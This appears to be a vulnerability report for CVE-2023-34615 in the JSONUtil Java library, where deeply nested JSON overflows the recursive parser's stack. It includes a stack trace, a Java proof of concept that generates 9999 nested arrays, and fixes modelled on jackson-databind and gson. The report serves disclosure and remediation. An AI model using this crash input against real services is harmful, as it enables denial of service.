Headline
CVE-2023-34615: Stack overflow error caused by jsonutil parsing of untrusted JSON String · Issue #10 · billdavidson/JSONUtil
An issue was discovered JSONUtil thru 5.0 allows attackers to cause a denial of service or other unspecified impacts via crafted object that uses cyclic dependencies.
Stack overflow error caused by jsonutil parsing of untrusted JSON String****Description
Using jsonutil to parse untrusted JSON String may be vulnerable to denial of service (DOS) attacks. If the parser is running on user supplied input, an attacker may supply content that causes the parser to crash by stackoverflow.
Error Log
Exception in thread "main" java.lang.StackOverflowError
at net.pwall.util.ParseText.skipSpaces(ParseText.java:1072)
at net.pwall.json.JSON.parse(JSON.java:535)
at net.pwall.json.JSON.parse(JSON.java:567)
at net.pwall.json.JSON.parse(JSON.java:567)
at net.pwall.json.JSON.parse(JSON.java:567)
at net.pwall.json.JSON.parse(JSON.java:567)
at net.pwall.json.JSON.parse(JSON.java:567)
at net.pwall.json.JSON.parse(JSON.java:567)
at net.pwall.json.JSON.parse(JSON.java:567)
at net.pwall.json.JSON.parse(JSON.java:567)
at net.pwall.json.JSON.parse(JSON.java:567)
at net.pwall.json.JSON.parse(JSON.java:567)
at net.pwall.json.JSON.parse(JSON.java:567)
at net.pwall.json.JSON.parse(JSON.java:567)
at net.pwall.json.JSON.parse(JSON.java:567)
at net.pwall.json.JSON.parse(JSON.java:567)
at net.pwall.json.JSON.parse(JSON.java:567)
at net.pwall.json.JSON.parse(JSON.java:567)
at net.pwall.json.JSON.parse(JSON.java:567)
at net.pwall.json.JSON.parse(JSON.java:567)
at net.pwall.json.JSON.parse(JSON.java:567)
at net.pwall.json.JSON.parse(JSON.java:567)
at net.pwall.json.JSON.parse(JSON.java:567)
at net.pwall.json.JSON.parse(JSON.java:567)
at net.pwall.json.JSON.parse(JSON.java:567)
PoC
<dependency\>
<groupId\>net.pwall.json</groupId\>
<artifactId\>jsonutil</artifactId\>
<version\>5.0</version\>
</dependency\>
import net.pwall.json.JSON;
public class PoC {
public final static int TOO\_DEEP\_NESTING = 9999;
public final static String TOO\_DEEP\_DOC = \_nestedDoc(TOO\_DEEP\_NESTING, "\[ ", "\] ", "0");
public static String \_nestedDoc(int nesting, String open, String close, String content) {
StringBuilder sb = new StringBuilder(nesting \* (open.length() + close.length()));
for (int i = 0; i < nesting; ++i) {
sb.append(open);
if ((i & 31) == 0) {
sb.append("\\n");
}
}
sb.append("\\n").append(content).append("\\n");
for (int i = 0; i < nesting; ++i) {
sb.append(close);
if ((i & 31) == 0) {
sb.append("\\n");
}
}
return sb.toString();
}
public static void main(String\[\] args) {
String jsonString = TOO\_DEEP\_DOC;
JSON.parse(jsonString);
}
}
Rectification Solution
Refer to the solution of jackson-databind: Add the depth variable to record the current parsing depth. If the parsing depth exceeds a certain threshold, an exception is thrown. (FasterXML/jackson-databind@fcfc499)
Refer to the GSON solution: Change the recursive processing on deeply nested arrays or JSON objects to stack+iteration processing.((google/gson@2d01d6a20f39881c692977564c1ea591d9f39027))
Related news
An issue was discovered JSONUtil through 5.0 that allows attackers to cause a denial of service or other unspecified impacts via crafted objects that deeply nested structures.